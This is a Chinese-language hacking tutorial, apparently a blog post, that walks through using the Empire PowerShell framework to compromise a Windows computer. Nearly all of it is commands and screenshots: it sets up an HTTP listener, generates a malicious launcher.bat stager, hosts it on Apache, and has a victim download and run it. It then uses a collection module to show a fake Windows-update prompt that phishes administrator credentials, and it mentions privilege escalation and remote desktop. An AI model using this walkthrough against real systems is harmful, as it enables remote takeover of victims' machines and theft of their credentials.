安装Empire powershell框架
针对Kali linux(Debian内核)或者Ubuntu内核的Linux操作系统,需要输入下面的命令安装Empire powershell
如果是CentOs的则需要使用yum安装
sudo apt install powershell-empire![图片[2]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906084130571-1024x342.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
启动Empire powershell服务端
powershell-empire server![图片[3]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906084256541.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
启动Empire powershell 客户端
powershell-empire client使用http相关模块
uselistener http![图片[4]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906084440381-1024x614.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
设置监听端口为4321
set Port 4321![图片[5]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906084546137.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
运行
execute
如果之前运行过会有相应的提示,我们则可以输入listeners进行展示
![图片[6]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906084633944.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后使用windows/launcher_bat模块
usestager windows/launcher_bat![图片[7]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906084707389.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
设置为http监听
set Listener http之后运行
execute
可以看到恶意的bat文件已经生成好了
![图片[8]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906084807936-1024x132.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
使用apache服务托管恶意文件
之后启动apache服务
sudo systemctl start apache2.service
然后将恶意bat文件拷入到apache的web服务路径下
sudo mv /var/lib/powershell-empire/empire/client/generated-stagers/launcher.bat /var/www/html/launcher.bat![图片[9]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906084919677-1024x79.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
热心网友下载并运行恶意文件
托管完成后,我们就可以引导用户去下载恶意文件了,这个是内网的IP地址,您需要根据自己的实际情况进行修改
![图片[10]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906085056947.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后保存好
![图片[11]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906085134132.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
您可以双击进行运行
![图片[12]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906085153488-1024x301.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后你会发现很神奇的事情发生了,它消失了……
![图片[13]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906085214890-1024x329.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
回到kali linux上,可以看到我们已经成功连上了
![图片[14]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906085255858.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
输入agents可以查看连接上的计算机的详细信息
![图片[15]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906085331591-1024x300.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后我们使用powershell/collection/toasted模块
usemodule powershell/collection/toasted![图片[16]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906085409162.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后进行参数的设置
set VerifyCreds TrueAgent需要填写我们这里获取到的Name
![图片[17]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906085539308.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
set Agent Z74L2PBU一切都设置好之后运行即可
execute![图片[18]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906085501103.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
之后回到windows电脑,你会发现,这里有一个很有趣的弹窗
![图片[19]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906085649447-1024x551.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
放大看,这里是提醒我们windows将在5分钟之后完成升级安装,如果我们点击重启
![图片[20]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906085715659.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
则会发现出现了一个windows内置的窗口
![图片[21]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906085818294-1024x567.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
放大看,这里需要输入管理员账户和密码,才可以重启电脑……
![图片[22]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906085833355.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
这时,如果热心网友输入了自己的账户和密码
![图片[23]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906085908172.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
回到kali linux,我们可以看到通过钓鱼的方式,获取的账户和密码凭证
![图片[24]-黑客如何通过一个bat文件控制整台计算机-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220906085952125-1024x525.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
除此之外,还演示了如何提权、如何打开远程桌面的操作,这里不再赘述,更多有趣的可以自行研究!
© 版权声明
THE END
暂无评论内容